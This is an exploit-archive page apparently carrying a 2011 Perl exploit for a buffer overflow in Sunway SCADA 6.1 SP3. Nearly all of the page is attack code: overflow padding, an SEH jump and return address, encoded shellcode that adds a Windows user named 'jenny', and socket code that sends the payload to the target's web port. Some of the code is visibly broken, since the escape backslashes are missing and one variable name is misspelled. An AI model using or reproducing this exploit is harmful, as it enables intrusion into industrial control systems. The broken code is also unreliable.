Home / exploitsPDF  

Sunway SCADA 6.1 SP3 Buffer Overflow

Posted on 04 September 2011

#!/usr/bin/perl
#Sunway SCADA Add User Exploit for fun ;)
#Tested on XP SP1
#contact: n00bfuker@gmx.de

use IO::Socket;
use strict;

my $target = $ARGV[0];

my $otuzuc = "W" x 1127;

my $otuz = "xebx06x90x90"; # jmp
my $seksen = "x98x15xD7x5A"; # ret

# windows/adduser - 446 bytes Encoder: x86/alpha_mixed
# USER=jenny, EXITFUNC=seh, PASS=pass
my $yetmisxxxx = "x89xe6xdbxc8xd9x76xf4x5fx57x59x49x49x49x49x49".
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a".
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32".
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49".
"x4bx4cx4bx58x47x34x45x50x43x30x43x30x4cx4bx50".
"x45x47x4cx4cx4bx43x4cx43x35x42x58x43x31x4ax4f".
"x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4a".
"x4bx50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31".
"x49x50x4cx59x4ex4cx4bx34x49x50x44x34x45x57x49".
"x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47x4b".
"x51x44x51x34x45x54x43x45x4ax45x4cx4bx51x4fx46".
"x44x45x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4b".
"x51x4fx45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45".
"x51x4ax4bx4bx39x51x4cx47x54x45x54x49x53x51x4f".
"x50x31x4ax56x43x50x50x56x45x34x4cx4bx50x46x50".
"x30x4cx4bx51x50x44x4cx4cx4bx44x30x45x4cx4ex4d".
"x4cx4bx43x58x45x58x4dx59x4ax58x4cx43x49x50x42".
"x4ax50x50x45x38x4cx30x4cx4ax44x44x51x4fx43x58".
"x4ax38x4bx4ex4cx4ax44x4ex46x37x4bx4fx4ax47x42".
"x43x42x4dx43x54x46x4ex43x55x43x48x43x55x51x30".
"x46x4fx42x43x51x30x42x4ex42x45x44x34x47x50x44".
"x35x42x53x45x35x43x42x51x30x43x5ax43x55x42x4e".
"x42x4ex43x49x47x50x42x50x43x51x43x43x43x43x51".
"x30x46x4fx51x51x51x54x51x54x51x30x51x36x47x56".
"x47x50x42x4ex45x35x44x34x47x50x42x4cx42x4fx43".
"x53x43x51x42x4cx43x57x42x52x42x4fx42x55x44x30".
"x51x30x51x51x45x34x42x4dx42x49x42x4ex45x39x44".
"x33x44x34x43x42x43x51x44x34x42x4fx42x52x43x43".
"x47x50x43x5ax45x35x42x4ex42x4ex43x49x51x30x46".
"x4fx47x31x51x54x47x34x43x30x41x41";

my $sentamamlakardes = "x90" x 800; #junk


my $payload = $otuzuc.$otuz.$seksen.$yetmisxxxx.$sentamamlakardes;

#Bir basit kelama kurban gider krallar...


my($SOCKET) = new IO::Socket::INET( Proto   => "tcp",
PeerAddr=> "$targer:80");
if (! defined $SOCKET) { die $!; }
print $SOCKET "GET /$payload HTTP/1.0

";

close($SOCKET);
my($SOCKET2) = new IO::Socket::INET( Proto   => "tcp",
PeerAddr=> "$target:80");
if (! defined $SOCKET2) { die $!; }
print $SOCKET2 "GET / HTTP/1.0

";

 

TOP

Malware :

Exploits :